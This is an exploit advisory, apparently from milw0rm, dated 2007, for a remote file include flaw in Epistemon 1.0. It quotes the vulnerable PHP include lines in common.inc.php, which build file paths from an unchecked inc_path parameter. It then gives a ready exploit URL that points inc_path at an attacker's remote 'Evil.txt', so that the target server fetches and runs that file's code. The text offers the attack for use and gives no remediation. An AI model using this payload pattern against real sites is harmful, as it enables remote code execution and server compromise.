Epistemon 1.0 (common.php inc_path) Remote File Include Vulnerability :

Date : 2007-02-01 Author : GoLd_M
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Epistemon 1.0 <=  Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali) & &  Contact: [email protected]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:

http://sourcesup.cru.fr/frs/download.php/668/Epistemon_V1.tgz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

V.CODE: In : /plateforme/code/inc/common.inc.php

include($inc_path.'config.php');
include ($inc_path."i18n.inc.php");
include ($inc_path."const.inc.php")      ;
include ($inc_path."c_init.inc".$ext)     ;
include ($inc_path."c_chapitre.inc".$ext) ;
include ($inc_path."c_color.inc".$ext)    ;

include ($inc_path."c_connexion.inc".$ext);
include ($inc_path."c_file.inc".$ext)     ;
include ($inc_path."c_formation.inc".$ext);
include ($inc_path."c_groupe.inc".$ext)   ;
include ($inc_path."c_header.inc".$ext)   ;
include ($inc_path."c_mail.inc".$ext)     ;
include ($inc_path."c_membre.inc".$ext)   ;
include ($inc_path."c_webmail.inc".$ext)  ;
include ($inc_path."c_module.inc".$ext)   ;
include ($inc_path."c_mysql.inc".$ext)    ;
include ($inc_path."c_phorum.inc".$ext)   ;
include ($inc_path."c_tuteur.inc".$ext)   ;
include ($inc_path."c_document.inc".$ext) ;
include ($inc_path."html.inc".$ext)       ;
include ($inc_path."c_complement.inc".$ext);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2007-02-01]

C1

 

C2

 

C3